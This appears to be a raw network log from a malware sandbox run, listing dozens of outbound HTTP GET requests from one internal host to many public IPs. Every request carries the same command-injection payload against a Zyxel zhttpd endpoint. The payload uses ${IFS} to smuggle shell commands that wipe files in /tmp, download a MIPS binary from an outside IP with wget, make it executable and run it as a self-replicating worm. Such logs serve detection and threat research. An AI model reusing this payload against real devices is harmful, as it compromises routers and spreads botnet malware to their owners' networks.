                                                Jan 12, 2024 18:24:29.690448046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2966192.168.2.135638041.44.201.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.690458059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2967192.168.2.1333882115.70.30.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.690522909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2968192.168.2.134191285.12.138.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.690562010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2969192.168.2.1343840131.11.136.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.690582991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2970192.168.2.135210431.33.142.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.690620899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2971192.168.2.133511823.131.41.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.690701008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2972192.168.2.1335118183.40.106.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.690752029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2973192.168.2.1334946144.123.158.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.690809011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2974192.168.2.13378042.238.212.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.690848112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2975192.168.2.1358926134.172.60.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.690912008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2976192.168.2.1334388143.76.8.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.690959930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2977192.168.2.135839065.214.44.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.691034079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2978192.168.2.133329062.151.155.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.691072941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2979192.168.2.134286051.221.107.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.691123009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2980192.168.2.1355924126.224.56.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.691178083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2981192.168.2.135980818.246.237.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.691205025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2982192.168.2.1349448217.189.189.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.691266060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2983192.168.2.1353552124.138.151.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.691313982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2984192.168.2.1352258141.40.173.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.691376925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2985192.168.2.1358434117.215.122.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.691414118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2986192.168.2.135647273.124.80.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.691494942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2987192.168.2.1355534187.17.226.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.691538095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2988192.168.2.1348424174.156.76.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.691582918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2989192.168.2.1333062138.74.235.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.691634893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2990192.168.2.135543086.190.67.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.691680908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2991192.168.2.134913663.67.206.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.691704988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2992192.168.2.135474492.251.42.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.691788912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2993192.168.2.1342828171.163.16.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.691852093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2994192.168.2.1336150114.42.113.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.691914082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2995192.168.2.134474887.231.245.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.691955090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2996192.168.2.136099299.232.200.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.692017078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2997192.168.2.1344140198.255.148.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.692070007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2998192.168.2.134169495.254.220.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.692111969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2999192.168.2.1335230168.32.37.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.692166090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3000192.168.2.135754466.2.53.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.692195892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3001192.168.2.134252017.168.187.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.692234993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3002192.168.2.1337910175.204.110.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.692466974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3003192.168.2.1336568174.17.12.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.693192959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3004192.168.2.1351688185.183.223.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.693552971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3005192.168.2.1360436134.43.201.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.693681002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3006192.168.2.13353985.75.40.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.693960905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3007192.168.2.1354186151.124.55.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.694132090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3008192.168.2.1352690144.170.121.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.696111917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3009192.168.2.1337060121.14.101.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.696202993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3010192.168.2.135747646.6.64.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.696233034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3011192.168.2.1350818178.90.129.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.696285963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3012192.168.2.1360754189.155.181.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.696337938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3013192.168.2.1333194108.142.8.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.711312056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3014192.168.2.1357022137.156.180.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.711388111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3015192.168.2.1353412101.91.85.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.711441040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3016192.168.2.135812425.10.211.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.711477995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3017192.168.2.134906612.74.181.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.711565018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3018192.168.2.134927688.163.129.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.711627960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3019192.168.2.1340918135.70.206.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.711689949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3020192.168.2.1360370117.136.53.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.711757898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3021192.168.2.135456823.208.253.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.711817980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3022192.168.2.1356138163.37.150.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.711885929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3023192.168.2.1339992134.62.199.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.711962938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3024192.168.2.135122861.211.93.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.711993933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3025192.168.2.135271881.205.33.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.712071896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3026192.168.2.135967445.233.69.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.712125063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3027192.168.2.133773660.110.213.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.712212086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3028192.168.2.135536893.32.16.85443
                                                TimestampBytes transferredDirectionData
